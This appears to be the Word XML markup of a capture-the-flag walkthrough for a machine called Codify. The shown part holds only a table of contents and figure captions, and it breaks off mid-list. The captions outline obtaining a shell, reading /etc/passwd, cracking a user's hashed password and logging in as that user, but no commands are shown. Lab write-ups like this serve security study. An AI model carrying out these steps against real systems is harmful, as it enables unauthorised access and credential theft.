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763A" w14:textId="16D2CFC0" w:rsidR="00060C0E" w:rsidRPr="009A2540" w:rsidRDefault="0056210F" w:rsidP="00060C0E">
      <w:pPr>
        <w:pStyle w:val="Titolo"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Codify</w:t>
      </w:r>
      <w:r w:rsidR="00BC3B9E" w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5206B14C" w14:textId="30943AA5" w:rsidR="00CB3015" w:rsidRPr="009A2540" w:rsidRDefault="00CB3015" w:rsidP="00CB3015">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc157155766"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Index</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5E3281F5" w14:textId="0FEE7AE4" w:rsidR="00B22A3A" w:rsidRPr="00B22A3A" w:rsidRDefault="00CB3015">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
      </w:r>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc157155766" w:history="1">
        <w:r w:rsidR="00B22A3A" w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Index</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_Toc157155766 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00B22A3A" w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00B22A3A" w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00303595">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidR="00B22A3A" w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="52B088BE" w14:textId="62ED2CBD" w:rsidR="00B22A3A" w:rsidRPr="00B22A3A" w:rsidRDefault="00B22A3A">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc157155767" w:history="1">
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>List of pictures</w:t>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc157155767 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00303595">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="597ABAB6" w14:textId="33CB7492" w:rsidR="00B22A3A" w:rsidRPr="00B22A3A" w:rsidRDefault="00B22A3A">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc157155768" w:history="1">
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Disclaimer</w:t>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc157155768 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00303595">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5459C237" w14:textId="0A850702" w:rsidR="00B22A3A" w:rsidRPr="00B22A3A" w:rsidRDefault="00B22A3A">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc157155769" w:history="1">
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Reconnaissance</w:t>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc157155769 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00303595">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="127C999D" w14:textId="0E73BB2E" w:rsidR="00B22A3A" w:rsidRPr="00B22A3A" w:rsidRDefault="00B22A3A">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc157155770" w:history="1">
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Initial foothold</w:t>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc157155770 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00303595">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="511DE983" w14:textId="26C3843A" w:rsidR="00B22A3A" w:rsidRPr="00B22A3A" w:rsidRDefault="00B22A3A">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc157155771" w:history="1">
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>User flag</w:t>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc157155771 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00303595">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="03941964" w14:textId="64C3CCDD" w:rsidR="00B22A3A" w:rsidRPr="00B22A3A" w:rsidRDefault="00B22A3A">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc157155772" w:history="1">
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Privilege escalation</w:t>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc157155772 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00303595">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r w:rsidRPr="00B22A3A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4CFEF614" w14:textId="639EB9CA" w:rsidR="00CB3015" w:rsidRPr="009A2540" w:rsidRDefault="00CB3015" w:rsidP="00CB3015">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="77343B9E" w14:textId="7883258C" w:rsidR="00CB3015" w:rsidRPr="009A2540" w:rsidRDefault="00CB3015" w:rsidP="00CB3015">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc157155767"/>
      <w:r w:rsidRPr="009A2540">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>List of pictures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="35F461B8" w14:textId="7EF2CA2E" w:rsidR="00B22A3A" w:rsidRDefault="00B22A3A">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155783" w:history="1">
        <w:r w:rsidRPr="00E41F5D">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_Toc157155783 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00303595">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7B559F1D" w14:textId="0640F07B" w:rsidR="00B22A3A" w:rsidRDefault="00B22A3A">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc157155784" w:history="1">
        <w:r w:rsidRPr="00E41F5D">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Picture 2 - Application library</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc157155784 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00303595">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1EC6227C" w14:textId="7EEE1CD0" w:rsidR="00B22A3A" w:rsidRDefault="00B22A3A">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc157155785" w:history="1">
        <w:r w:rsidRPr="00E41F5D">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Picture 3 - Shell obtained with user without user flag</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc157155785 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00303595">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3225A7C5" w14:textId="5F7CF46E" w:rsidR="00B22A3A" w:rsidRDefault="00B22A3A">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc157155786" w:history="1">
        <w:r w:rsidRPr="00E41F5D">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Picture 4 - Obtain a better shell</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc157155786 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00303595">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="69A1F74C" w14:textId="169C8908" w:rsidR="00B22A3A" w:rsidRDefault="00B22A3A">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc157155787" w:history="1">
        <w:r w:rsidRPr="00E41F5D">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Picture 5 - /etc/passwd file</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc157155787 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00303595">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05990A6F" w14:textId="0BE7D748" w:rsidR="00B22A3A" w:rsidRDefault="00B22A3A">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc157155788" w:history="1">
        <w:r w:rsidRPr="00E41F5D">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Picture 6 - joshua' hashed credentials</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc157155788 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00303595">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B320669" w14:textId="5A9F74CA" w:rsidR="00B22A3A" w:rsidRDefault="00B22A3A">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc157155789" w:history="1">
        <w:r w:rsidRPr="00E41F5D">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Picture 7 - Password cracked</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc157155789 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00303595">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="292CCBED" w14:textId="4F407013" w:rsidR="00B22A3A" w:rsidRDefault="00B22A3A">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc157155790" w:history="1">
        <w:r w:rsidRPr="00E41F5D">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Picture 8 - Log in as joshua</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
